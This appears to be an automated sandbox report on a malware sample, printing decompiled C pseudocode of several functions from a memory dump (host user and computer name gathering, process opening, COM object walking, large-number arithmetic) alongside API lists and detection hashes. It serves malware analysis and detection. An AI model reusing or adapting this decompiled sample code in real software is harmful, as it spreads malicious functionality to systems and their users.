                                                          0x02b98663
                                                          0x02b9866d
                                                          0x02b98673
                                                          0x02b9867a
                                                          0x02b98684
                                                          0x02b98684
                                                          0x02b9867c
                                                          0x02b9867c
                                                          0x02b9867c
                                                          0x02b9867c
                                                          0x02b986a6
                                                          0x02b986ae
                                                          0x02b986dc
                                                          0x02b986e1
                                                          0x02b986e8
                                                          0x02b986ed
                                                          0x02b986f1
                                                          0x02b98723
                                                          0x02b986f3
                                                          0x02b98700
                                                          0x02b98703
                                                          0x02b98713
                                                          0x02b98716
                                                          0x02b9871c
                                                          0x02b9871c
                                                          0x02b986b0
                                                          0x02b986bd
                                                          0x02b986c0
                                                          0x02b986d2
                                                          0x02b986d5
                                                          0x02b986d5
                                                          0x02b9872d
                                                          0x02b98739
                                                          0x02b9872f
                                                          0x02b98732
                                                          0x02b98732
                                                          0x02b9872d
                                                          0x02b986a6
                                                          0x00000000
                                                          0x02b9866d
                                                          0x02b98616
                                                          0x02b98619
                                                          0x02b98620
                                                          0x02b98626
                                                          0x02b98629
                                                          0x02b9862b
                                                          0x02b98637
                                                          0x02b9863a
                                                          0x02b9863a
                                                          0x02b98640
                                                          0x02b98645
                                                          0x02b98645
                                                          0x02b9864b
                                                          0x00000000
                                                          0x02b9864b
                                                          0x02b98559
                                                          0x00000000
                                                          0x02b98580
                                                          0x02b98580
                                                          0x02b9858c
                                                          0x02b9859f
                                                          0x02b985a5
                                                          0x02b985ad
                                                          0x00000000
                                                          0x02b985ad

                                                          APIs
                                                          • StrChrA.SHLWAPI(02B93741,0000005F,00000000,00000000,00000104), ref: 02B98572
                                                          • lstrcpy.KERNEL32(?,?), ref: 02B9859F
                                                            • Part of subcall function 02B99070: lstrlen.KERNEL32(?,00000000,069B9A98,00000000,02B98808,069B9C76,?,?,?,?,?,63699BC3,00000005,02B9D00C), ref: 02B99077
                                                            • Part of subcall function 02B99070: mbstowcs.NTDLL ref: 02B990A0
                                                            • Part of subcall function 02B99070: memset.NTDLL ref: 02B990B2
                                                            • Part of subcall function 02B95D7D: lstrlenW.KERNEL32(?,?,?,02B98708,3D02B9C0,80000002,02B93741,02B9A513,74666F53,4D4C4B48,02B9A513,?,3D02B9C0,80000002,02B93741,?), ref: 02B95DA2
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02B985C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 93930979b5b04748e0f5c8e4afebb722cb9965de516eeac5f60890b599f02629
                                                          • Instruction ID: 3ed54d65781de12f69e68aa851039f38fc06f2d53f6616dcf23cabac58a77b90
                                                          • Opcode Fuzzy Hash: 93930979b5b04748e0f5c8e4afebb722cb9965de516eeac5f60890b599f02629
                                                          • Instruction Fuzzy Hash: 1251697250020AEFCF22AF60DE40EAA7BBAFF05384F1085A9F91597120D73AD925DF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9A199, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E02B9A199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E02B9A71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02B9A734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2b91fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                          0x02b9a1a7
                                                          0x02b9a1aa
                                                          0x02b9a1ad
                                                          0x02b9a1b3
                                                          0x02b9a1b8
                                                          0x02b9a1be
                                                          0x02b9a1c6
                                                          0x02b9a1c9
                                                          0x02b9a1cf
                                                          0x02b9a1d4
                                                          0x02b9a1e1
                                                          0x02b9a1ee
                                                          0x02b9a1f2
                                                          0x02b9a1f4
                                                          0x02b9a1f8
                                                          0x02b9a1fb
                                                          0x02b9a20b
                                                          0x02b9a25e
                                                          0x02b9a25f
                                                          0x02b9a20d
                                                          0x02b9a212
                                                          0x02b9a213
                                                          0x02b9a218
                                                          0x02b9a21b
                                                          0x02b9a22e
                                                          0x00000000
                                                          0x02b9a230
                                                          0x02b9a233
                                                          0x02b9a238
                                                          0x02b9a246
                                                          0x02b9a249
                                                          0x02b9a24f
                                                          0x02b9a254
                                                          0x00000000
                                                          0x02b9a256
                                                          0x02b9a256
                                                          0x02b9a259
                                                          0x02b9a259
                                                          0x02b9a254
                                                          0x02b9a22e
                                                          0x02b9a264
                                                          0x02b9a265
                                                          0x02b9a1d4
                                                          0x02b9a26b

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,02B91FD2), ref: 02B9A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,02B91FD2), ref: 02B9A1C9
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • GetUserNameW.ADVAPI32(00000000,02B91FD2), ref: 02B9A203
                                                          • GetComputerNameW.KERNEL32(02B91FD2,?), ref: 02B9A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02B91FD2,00000000,02B91FD4,00000000,00000000,?,?,02B91FD2), ref: 02B9A249
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 985c8d9775e0c2958ec6dd13f1ebea6e4805b39ec1efc18d06877d0eafa728f3
                                                          • Instruction ID: d156d8ebcb16e3582ed629d4cf28cef20b1088ffbc32b21bdd1aa6f8f062ad74
                                                          • Opcode Fuzzy Hash: 985c8d9775e0c2958ec6dd13f1ebea6e4805b39ec1efc18d06877d0eafa728f3
                                                          • Instruction Fuzzy Hash: A621F776901208FFCB11DFE9C9848EEBBB9EF48744B6044AAE501E7240E7359B14DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B93DE9, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E02B93DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02B95AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02B9A81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x2b9d128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                          0x02b93de9
                                                          0x02b93df6
                                                          0x02b93df8
                                                          0x02b93e5b
                                                          0x00000000
                                                          0x02b93e5b
                                                          0x02b93e10
                                                          0x02b93e17
                                                          0x02b93e23
                                                          0x02b93e28
                                                          0x02b93e2a
                                                          0x02b93e2c
                                                          0x02b93e2e
                                                          0x02b93e30
                                                          0x02b93e32
                                                          0x02b93e3e
                                                          0x02b93e4e
                                                          0x00000000
                                                          0x02b93e40
                                                          0x02b93e40
                                                          0x02b93e47
                                                          0x02b93e54
                                                          0x02b93e54
                                                          0x02b93e54
                                                          0x02b93e47
                                                          0x02b93e3e
                                                          0x02b93e59
                                                          0x00000000
                                                          0x00000000
                                                          0x02b93e5f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,02B967B8,?,?,00000000,00000000), ref: 02B93E23
                                                          • ResetEvent.KERNEL32(?), ref: 02B93E28
                                                          • GetLastError.KERNEL32 ref: 02B93E40
                                                          • GetLastError.KERNEL32(?,?,00000102,02B967B8,?,?,00000000,00000000), ref: 02B93E5B
                                                            • Part of subcall function 02B95AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,02B93E08,?,?,?,?,00000102,02B967B8,?,?,00000000), ref: 02B95AFD
                                                            • Part of subcall function 02B95AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02B93E08,?,?,?,?,00000102,02B967B8,?), ref: 02B95B5B
                                                            • Part of subcall function 02B95AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 02B95B6B
                                                          • SetEvent.KERNEL32(?), ref: 02B93E4E
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: f7f6cec9f50e9a01c6bfc042be36b0b60f42c267cc9f281ba99b70e41ec65060
                                                          • Instruction ID: e1ecc7b3df1d18717a392e8a07522cda6ef2e77505ebb59580246eb087f97e1e
                                                          • Opcode Fuzzy Hash: f7f6cec9f50e9a01c6bfc042be36b0b60f42c267cc9f281ba99b70e41ec65060
                                                          • Instruction Fuzzy Hash: F201AD31104A01ABDE306B31DD88F1BBBE8EF48BA4F204AB5F551920E0C720E814DA74
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B93E69, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E02B93E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2b9d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2b9d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2b9d258 = _t6;
					 *0x2b9d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2b9d254 = _t7;
					if(_t7 == 0) {
						 *0x2b9d254 =  *0x2b9d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                          0x02b93e71
                                                          0x02b93e77
                                                          0x02b93e7e
                                                          0x00000000
                                                          0x02b93ed8
                                                          0x02b93e80
                                                          0x02b93e88
                                                          0x02b93e95
                                                          0x02b93e95
                                                          0x02b93ed5
                                                          0x00000000
                                                          0x02b93ed5
                                                          0x02b93e97
                                                          0x02b93e97
                                                          0x02b93e9c
                                                          0x02b93eae
                                                          0x02b93eb3
                                                          0x02b93eb9
                                                          0x02b93ebf
                                                          0x02b93ec6
                                                          0x02b93ec8
                                                          0x02b93ec8
                                                          0x00000000
                                                          0x02b93ecf
                                                          0x02b93e91
                                                          0x00000000
                                                          0x00000000
                                                          0x02b93e93
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02B9131F,?,?,00000001,?,?,?,02B94EF2,?), ref: 02B93E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,02B94EF2,?), ref: 02B93E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02B94EF2,?), ref: 02B93E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02B94EF2,?), ref: 02B93EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,02B94EF2,?), ref: 02B93ED8
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 97c3ff802ae4e6f4bd8192d992f7d9810c4cb71fb906652d9f548a9f50571c3f
                                                          • Instruction ID: 81affefcf2482548886f0d7af5b3334d3546b70f00f6869b79fd25e9d5b679ba
                                                          • Opcode Fuzzy Hash: 97c3ff802ae4e6f4bd8192d992f7d9810c4cb71fb906652d9f548a9f50571c3f
                                                          • Instruction Fuzzy Hash: 90F04F70EC4742ABDB209B36EA19B193FA9E7887C1F100DA6E596C71C0D770C061CB35
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B96F3A, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E02B96F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2b9d2a8; // 0x3e1a5a8
					_t5 = _t103 + 0x2b9e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2b9c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2b9d2a8; // 0x3e1a5a8
												_t28 = _t109 + 0x2b9e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2b9d2a8; // 0x3e1a5a8
														_t33 = _t79 + 0x2b9e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                          0x02b96f3f
                                                          0x02b96f48
                                                          0x02b96f49
                                                          0x02b96f4d
                                                          0x02b96f53
                                                          0x02b96f59
                                                          0x02b96f62
                                                          0x02b96f68
                                                          0x02b96f72
                                                          0x02b96f74
                                                          0x02b96f7a
                                                          0x02b96f7f
                                                          0x02b96f8a
                                                          0x02b96f90
                                                          0x02b96f95
                                                          0x02b970b7
                                                          0x02b96f9b
                                                          0x02b96f9b
                                                          0x02b96fa8
                                                          0x02b96fae
                                                          0x02b96fb4
                                                          0x02b96fb8
                                                          0x02b96fbe
                                                          0x02b96fcb
                                                          0x02b96fcf
                                                          0x02b96fd5
                                                          0x02b96fd8
                                                          0x02b96fe0
                                                          0x02b96fe1
                                                          0x02b96fe5
                                                          0x02b96fe9
                                                          0x02b96fec
                                                          0x02b96fef
                                                          0x02b96ff5
                                                          0x02b96ffe
                                                          0x02b97004
                                                          0x02b97005
                                                          0x02b97008
                                                          0x02b97009
                                                          0x02b9700a
                                                          0x02b97012
                                                          0x02b97013
                                                          0x02b97014
                                                          0x02b97016
                                                          0x02b9701a
                                                          0x02b9701e
                                                          0x00000000
                                                          0x00000000
                                                          0x02b97024
                                                          0x02b9702d
                                                          0x02b97033
                                                          0x02b9703d
                                                          0x02b97041
                                                          0x02b97043
                                                          0x02b97050
                                                          0x02b97054
                                                          0x02b9705c
                                                          0x02b97061
                                                          0x02b97073
                                                          0x02b97075
                                                          0x02b9707b
                                                          0x02b9707b
                                                          0x02b97084
                                                          0x02b97084
                                                          0x02b97086
                                                          0x02b9708c
                                                          0x02b9708c
                                                          0x02b9708f
                                                          0x02b97095
                                                          0x02b97098
                                                          0x02b970a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b970a1
                                                          0x02b96ff5
                                                          0x02b96fef
                                                          0x02b96fd8
                                                          0x02b970a7
                                                          0x02b970a7
                                                          0x02b970ad
                                                          0x02b970ad
                                                          0x02b970b3
                                                          0x02b970b3
                                                          0x02b970bc
                                                          0x02b970c2
                                                          0x02b970c2
                                                          0x02b96f7f
                                                          0x02b970cb

                                                          APIs
                                                          • SysAllocString.OLEAUT32(02B9C290), ref: 02B96F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02B9706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B97084
                                                          • SysFreeString.OLEAUT32(?), ref: 02B970B3
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: 039b4736d076dbcc92860797e3795aec7797c26e6ef20ba8c4f6c40c555d61ed
                                                          • Instruction ID: d809b48a5700b2914e27e1f7a19f94a98b91a702fb266de9d02a5e61b9f35cbb
                                                          • Opcode Fuzzy Hash: 039b4736d076dbcc92860797e3795aec7797c26e6ef20ba8c4f6c40c555d61ed
                                                          • Instruction Fuzzy Hash: 43513D75D00519EFCF10DFA8C888DAEF7BAEF89704B154599E915EB210DB329D41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B953C6, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E02B953C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02B91AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02B950FF(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02B95745(_t101,  &_v236, _a8, _t96 - _t81);
					E02B95745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E02B950FF(_t101, 0x2b9d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02B950FF(_a16, _a4);
						E02B95088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02B9AF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02B9AF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E02B95F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E02B990C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02B96044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2b9d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                          0x02b953c9
                                                          0x02b953d5
                                                          0x02b953db
                                                          0x02b953e0
                                                          0x02b953e4
                                                          0x02b95541
                                                          0x02b95545
                                                          0x02b95545
                                                          0x02b953ea
                                                          0x02b953ee
                                                          0x02b953f2
                                                          0x02b953f5
                                                          0x02b95400
                                                          0x02b95406
                                                          0x02b9540b
                                                          0x02b9540e
                                                          0x02b95428
                                                          0x02b95434
                                                          0x02b9543d
                                                          0x02b95447
                                                          0x02b9544c
                                                          0x02b9544e
                                                          0x02b95451
                                                          0x02b954ff
                                                          0x02b95505
                                                          0x02b95516
                                                          0x02b95529
                                                          0x02b95539
                                                          0x00000000
                                                          0x02b9553e
                                                          0x02b9545a
                                                          0x02b95461
                                                          0x02b95465
                                                          0x02b9546b
                                                          0x02b9546d
                                                          0x02b9546f
                                                          0x02b95471
                                                          0x02b95473
                                                          0x02b9547d
                                                          0x02b95482
                                                          0x02b95484
                                                          0x02b95486
                                                          0x02b95487
                                                          0x02b95488
                                                          0x02b95489
                                                          0x02b95490
                                                          0x02b95497
                                                          0x02b9549a
                                                          0x02b9549a
                                                          0x02b95467
                                                          0x02b95467
                                                          0x02b95467
                                                          0x02b954a2
                                                          0x02b954aa
                                                          0x02b954b3
                                                          0x02b954b8
                                                          0x02b954b8
                                                          0x02b954bd
                                                          0x00000000
                                                          0x00000000
                                                          0x02b954bf
                                                          0x02b954c2
                                                          0x02b954cc
                                                          0x00000000
                                                          0x00000000
                                                          0x02b954ce
                                                          0x02b954ce
                                                          0x02b954d8
                                                          0x02b954b8
                                                          0x02b954bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b954bd
                                                          0x02b954e2
                                                          0x02b954e5
                                                          0x02b954e8
                                                          0x02b954ef
                                                          0x02b954ef
                                                          0x02b954fc
                                                          0x00000000
                                                          0x02b954fc
                                                          0x02b953f7
                                                          0x02b953fb
                                                          0x02b953fc
                                                          0x02b953fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b953fe
                                                          0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02B95473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02B95489
                                                          • memset.NTDLL ref: 02B95529
                                                          • memset.NTDLL ref: 02B95539
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 1b3208f0bae7891ea2b12efb9a03a5ed28cff0d68af8ab5c10783eeed3d1cc8d
                                                          • Instruction ID: 12e09fd0e78bfee6e4ba92fe3f06fb7a841f4559ae23d9a9014c24712402bac4
                                                          • Opcode Fuzzy Hash: 1b3208f0bae7891ea2b12efb9a03a5ed28cff0d68af8ab5c10783eeed3d1cc8d
                                                          • Instruction Fuzzy Hash: A441F431640209ABDF21DFA8CC80BDE7776EF45310F5085B9F91AA7284DB70AD458F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9A81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 02B9A82E
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • ResetEvent.KERNEL32(?), ref: 02B9A8A2
